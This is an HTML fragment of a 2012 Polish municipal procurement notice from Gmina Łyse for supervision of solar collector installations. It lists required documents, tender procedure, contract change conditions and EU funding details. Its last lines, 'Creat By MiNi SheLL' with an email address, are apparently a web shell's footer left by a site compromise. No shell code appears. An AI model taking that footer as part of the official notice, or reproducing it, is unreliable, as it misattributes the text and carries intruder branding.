<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada oświadczenie o braku podstaw do wykluczenia (załącznik nr 4 do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany umowy. Wszystkie ewentualne zmiany umowy wymagają formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania art. 144 ust. 1 ustawy Prawo zamówień publicznych.
Zamawiający dopuszcza możliwość zmiany umowy w następującym zakresie: 
1)Zmiana wysokości podatku VAT. 
- warunkiem zmiany będzie ewentualna zmiana ustawowych stawek podatku VAT w okresie realizacji i rozliczania zadania w odniesieniu do objętego umową przedmiotu zamówienia.

2)Zmiana dat i terminów wypełnienia zobowiązań
- warunkiem zmiany będzie zadziałanie siły wyższej
a) pod pojęciem siły wyższej rozumie się wszystkie wydarzenia, których nie mogła 
przewidzieć żadna ze stron w dniu podpisania umowy, występujące po tej dacie, nie 
dające się uniknąć i pozostające poza kontrolą obydwu stron. Przypadkami siły wyższej są np. powódź, trzęsienie ziemi, pożar, wybuch, wojna, itp
b) za siłę wyższą nie uważa się braku środków Wykonawcy na realizację przedmiotu umowy, jak również nie wywiązanie się z umów przez kontrahentów Wykonawcy, 
c) strona umowy chcąca zgłosić roszczenia wynikające z siły wyższej na obowiązek niezwłocznie powiadomić na piśmie drugą stronę o jej wystąpieniu i zakończeniu, 
d) strona zgłaszająca roszczenia musi udowodnić drugiej stronie wystąpienie siły 
wyższej za pomocą dokumentów wydanych przez odpowiednie, uprawnione do tego instytucje,

3)Zmiany miejsca montażu instalacji solarnych (zmiana miejsca świadczenia usług nadzoru inwestorskiego) 
- warunkiem zmiany będzie jedna z następujących okoliczności:
A. gdy w trakcie wykonywania przedmiotu zamówienia, ujawni się brak technicznych 
warunków do dokonania stosownego montażu, 
B. gdy ze względu na decyzję osób trzecich, których zgoda jest niezbędna do dokonania 
montażu, nie będzie możliwy montaż we wskazanej lokalizacji. 

4)Treść umowy o udzielenie zamówienia publicznego może podlegać zmianie w przypadku zmian umowy o dofinansowanie projektu zawartej przez Zamawiającego lub wytycznych dotyczących realizacji projektu. Zakres ewentualnych zmian musi ściśle wynikać (wiązać się) ze zmianą umowy o dofinansowanie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminalyse.pl    oraz     bip.gminalyse.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy
ul. Ostrołęcka 2 
07-437 Łyse pok. nr 15 
tel. 29 77 25 003, fax. 29 77 25 027 wew. 41..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.09.2012 godzina 10:00, miejsce: Urząd Gminy
ul. Ostrołęcka 2 
07-437 Łyse, pok. nr 22 - sekretariat
tel. 29 77 25 003, fax. 29 77 25 027 wew. 41..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie stanowi część Projektu pn. Wykorzystanie odnawialnych źródeł energii na Kurpiowszczyźnie poprzez kompleksowy montaż kolektorów słonecznych w gminach: Łyse i Baranowo współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu IV - Środowisko, zapobieganie zagrożeniom i energetyka, Działania 4.3 - Ochrona powietrza, energetyka - Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com